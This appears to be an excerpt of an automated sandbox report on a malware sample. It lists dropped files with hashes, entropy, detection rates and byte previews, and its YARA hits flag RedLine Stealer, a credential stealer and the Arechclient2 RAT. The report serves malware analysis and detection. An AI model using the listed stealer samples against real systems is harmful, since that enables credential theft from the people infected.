                                                                                                                                                      MD5:ADBB3C5CA658C7F824DDE7C6A40BA602
                                                                                                                                                      SHA1:31F03EAFD2995BBCA8DFDDA6845B8E1471D9911D
                                                                                                                                                      SHA-256:C0282BEB0B60736CEDD606FDF4C43E1C30F5CE4AC7963F29BD78D6C4101CA258
                                                                                                                                                      SHA-512:81F0DCF7FE7DC45CF0AFA51E7866F03586273E9DF8EA4BE403DA15FF5EBE2519F14A6C78AF5E30BFE7E452D19F497C137F6DB5D2EBF5B78B67873FE644F5E927
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FP.............4>.. %../?..1"..20..f...3...)6..+"..20..3!.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ..)...28../+..>Q.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ..)...'%..("..(2..FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ..........8..)"..2.......'<..)#..FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ..t..sa.qQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.3.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3369
                                                                                                                                                      Entropy (8bit):5.442189701509085
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:gHuy5iSCSN1RlVcM2EPnP4P4P4P4PRPRPRc:wYSCSN1RlVcM2EPnP4P4P4P4PRPRPRc
                                                                                                                                                      MD5:C9F00324A455E6BA62E15B8FB526ECF7
                                                                                                                                                      SHA1:E300A02D2D7B50CD824007433720EA6F963634AC
                                                                                                                                                      SHA-256:3B63876123AD02E1AB6FCC98B42862099AB0B0FC83F7077CB19D5C65F1056A55
                                                                                                                                                      SHA-512:00D87046AA414E4AB0EBEA3E82D8C0861F92B5D2E2B0D0618BE1DFADF7CA4509293A46D2FDD02E77945FDAEF7AE8E1E80ECE52C7B365004EFEB80FD6150BE5F3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[04/27/24 02:20:46] Main : OS Version = osWin10...[04/27/24 02:20:46] CommandLineSwitchExists : Result of check = False. Param Value (if not exact match) = ...[04/27/24 02:20:46] Installer Target URL request = {"IPAddress":"192.168.2.4","Status":1,"Language":"en","OSMinorVersion":0,"OSMajorVersion":10,"ProductId":"5488CB36-BE62-4606-B07B-2EE938868BD1","Is64Bit":true,"ECommId":"11A12794-499E-4FA0-A281-A9A9AA8B2685"}...[04/27/24 02:20:48] Installer target url response = {"Url":"https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe","ProductName":"System Mechanic Standard","Result":0,"ErrorMessage":null}...[04/27/24 02:20:48] DownloadAndLaunchInstaller : Creating BITS download handler...[04/27/24 02:20:48] !&TioloBITSHandler.InitCopyMgr : CreateCOMObject(CLSID_BackgroundCopyManager1_5)..[04/27/24 02:20:48] !&TioloBITSHandler.InitCopyMgr : Copy manager initialized = True...[04/27/24 02:20:48] DownloadAndLaunchInstaller : Target folder ="C:\User
                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Fri Apr 26 23:19:52 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1063
                                                                                                                                                      Entropy (8bit):4.9965499076602775
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:85EmC+0/h8tXRKgKI+6GzryE0yAKfCs2V3qyFm:8fCx/hQXRXxXdRGlyF
                                                                                                                                                      MD5:115DA8A22D3E3D6EC2DB00DFDE0A9F2D
                                                                                                                                                      SHA1:860F74798E7B0003B38528823CB498B9C408C7DA
                                                                                                                                                      SHA-256:F305A14EEE8C195DD9B26A78FB666A292A961A1888ABD6C4AF88672A1D57D21E
                                                                                                                                                      SHA-512:E1FF60BF1A76A938E6FFE871C961C48057B6680B6BD48604829346587F941F6C32AB2D4ABB658735031B9B45127F486EDF91ED1360BB630B0FDC852D20940B48
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:L..................F.... ....Z.!....JO|.8....Z.!....0.%.......................:..DG..Yr?.D..U..k0.&...&......vk.v....a..y8...Xkm.8.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X[............................%..A.p.p.D.a.t.a...B.P.1......XY...Local.<......CW.^.X[.....b......................'..L.o.c.a.l.....N.1......Xw...Temp..:......CW.^.Xw.....l.....................M&..T.e.m.p.....T.1......X{...u3bs.2..>......Xw..X{....._...................... /.u.3.b.s...2.....V.2.0.%..X./ .run.exe.@......X./.X{..............................r.u.n...e.x.e......._...............-.......^...........p.by.....C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe......\.u.3.b.s...2.\.r.u.n...e.x.e.........|....I.J.H..K..:...`.......X.......066656...........hT..CrF.f4... .u.T..b...,.......hT..CrF.f4... .u.T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9.
                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):786944
                                                                                                                                                      Entropy (8bit):6.809298494568767
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
                                                                                                                                                      MD5:5AEBA331CE853D10C82B56ADC96C9E80
                                                                                                                                                      SHA1:A208059F9591712ABF451114815B693AB14A5AB3
                                                                                                                                                      SHA-256:EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
                                                                                                                                                      SHA-512:5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\osssciedmed, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\osssciedmed, Author: Joe Security
                                                                                                                                                      • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\osssciedmed, Author: ditekSHen
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 65%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 61%, Browse
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}....*.0........... ....X..{M...*..0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):28672
                                                                                                                                                      Entropy (8bit):2.5793180405395284
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\Desktop\TNQTc6Qmkg.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):294400
                                                                                                                                                      Entropy (8bit):6.770967482619401
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:UHxuFIQ09pm10VCYK+6y8ctD8hrA9C56Mr62QBsfLlpqy7spozLI9K72q8VAXoDu:AImMZeCg2KYLjICzLIMfFoDof2K
                                                                                                                                                      MD5:BB2810421305B969836433A1DFB11271
                                                                                                                                                      SHA1:B539A84F42A3E07253BFC76AB2CC89DE6FDF6F7C
                                                                                                                                                      SHA-256:84A11B7B44F40E21F2B778875BB6AF408A014EEB907FB846CBCC7EA73131CEFA
                                                                                                                                                      SHA-512:94BC6848061595B7D2C78DD03CB488EB1C51CF53F372D725687353B47C6C601DD6D2470CF308720E556FA7D6160EA1185F034E75DB793C6BDD592DD3606A0963
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 39%, Browse
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ku.[Ku.[Ku.[F'e[Uu.[F'Z[.u.[F'[[du.[B.)[Hu.[Ku.[;u.[.._[Ju.[F'a[Ju.[..d[Ju.[RichKu.[................PE..L...u.xd.....................:.......A.......0....@.................................]...........................................(........h...................`..\....2..8..............................@............0...............................text............................... ..`.rdata...l...0...n..................@..@.data....K.......r..................@....rsrc....h.......j..................@..@.reloc..\....`.......h..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\Desktop\TNQTc6Qmkg.exe
                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3884863
                                                                                                                                                      Entropy (8bit):7.9982714074161665
                                                                                                                                                      Encrypted:true
                                                                                                                                                      SSDEEP:98304:7goFFJ7lj6j1elkeoTNxPxDZhAryYACWcTIxlN+ba:7guJ7wpfTDPxD0P2YG
                                                                                                                                                      MD5:78D3CA6355C93C72B494BB6A498BF639
                                                                                                                                                      SHA1:2FA4E5DF74BFE75C207C881A1B0D3BC1C62C8B0E
                                                                                                                                                      SHA-256:A1DD547A63B256AA6A16871ED03F8B025226F7617E67B8817A08444DF077B001
                                                                                                                                                      SHA-512:1B2DF7BEE2514AEE7EFD3579F5DD33C76B40606D07DBA69A34C45747662FAD61174DB4931BCA02B058830107959205E889FEE74F8CCC9F6E03F9FD111761F4EA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:PK.........?.X........I......bunch.dat\]...:.... "*...T.......N<wf..X $;.e..)....|u]+...U*V.~.....f.Rje.......@.f.r..V....J-.#U...*..=.T..E.5.Z..&..z...'.k..%..Je.....[5.....P..B...@........G..z[*.-B1....Jz#....%.J...j...W........>62.jK(...........E.T.Q}.j._I..R.TEj.>..O.*.:J%o.......`.f+O...W>.....S.INC.m.6..|wQ.xk.K.....o.D....:.n4....P>..*M._|...P.R@.gW...k..X...MbM.....H....... .....#o.CC.!...1!R.g....Qc "P....Q.3.H.B.F.|...)...........@..W.6..Z..7.9.....d'`_.6.zr%a.....*.7.,...l....h.v......P.O.f..!..Y..#..Y.7..g..v=..k....J...N#\.5.....]......<.VGU.~....,..X.o.k..#..?v..%.0.+...m.(m..ah.JG>.....m..V......kb...B.jX...V$p... ..?.<....^...%KA=0\.(......Q.l>.;x..#W.@@.tIU ...Q............./e.7Ew..}h..^N... ........+.........bRz.........2r.f..u'o..s.}1...j.{.'%.......?..Z..M.....9.|P..W.o...c...3....H\.4..B......;14.65.Q3....24$...2(..9j......!.$..<<....P#b..Lj.D.vG.+.}.T..6tR..b."..o.f...h>.*......Z..5.(....]........
                                                                                                                                                      Process:C:\Users\user\Desktop\TNQTc6Qmkg.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1640960
                                                                                                                                                      Entropy (8bit):6.484662993855079
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
                                                                                                                                                      MD5:D1BA9412E78BFC98074C5D724A1A87D6
                                                                                                                                                      SHA1:0572F98D78FB0B366B5A086C2A74CC68B771D368
                                                                                                                                                      SHA-256:CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
                                                                                                                                                      SHA-512:8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 13%, Browse
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\Desktop\TNQTc6Qmkg.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1329417
                                                                                                                                                      Entropy (8bit):7.898171122766659
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
                                                                                                                                                      MD5:1E8237D3028AB52821D69099E0954F97
                                                                                                                                                      SHA1:30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
                                                                                                                                                      SHA-256:9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
                                                                                                                                                      SHA-512:A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O
                                                                                                                                                      Process:C:\Users\user\Desktop\TNQTc6Qmkg.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1596416
                                                                                                                                                      Entropy (8bit):6.46619614175955
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
                                                                                                                                                      MD5:10D51BECD0BBCE0FAB147FF9658C565E
                                                                                                                                                      SHA1:4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
                                                                                                                                                      SHA-256:7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
                                                                                                                                                      SHA-512:29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\Desktop\TNQTc6Qmkg.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2469936
                                                                                                                                                      Entropy (8bit):6.434916453080517
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
                                                                                                                                                      MD5:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                      SHA1:FE54B31B0DB8665AA5B22BED147E8295AFC88A03
                                                                                                                                                      SHA-256:A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
                                                                                                                                                      SHA-512:140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\Desktop\TNQTc6Qmkg.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):87278
                                                                                                                                                      Entropy (8bit):4.38402884518968
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
                                                                                                                                                      MD5:A723BF46048E0BFB15B8D77D7A648C3E
                                                                                                                                                      SHA1:8952D3C34E9341E4425571E10F22B782695BB915
                                                                                                                                                      SHA-256:B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
                                                                                                                                                      SHA-512:CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t
                                                                                                                                                      Process:C:\Users\user\Desktop\TNQTc6Qmkg.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4866096
                                                                                                                                                      Entropy (8bit):6.542818068158205
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
                                                                                                                                                      MD5:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                      SHA1:E10F3434EF3021C399DBBA047832F02B3C898DBD
                                                                                                                                                      SHA-256:4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
                                                                                                                                                      SHA-512:CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):32768
                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):32768
                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1640960
                                                                                                                                                      Entropy (8bit):6.484662993855079
                                                                                                                                                      Encrypted:false
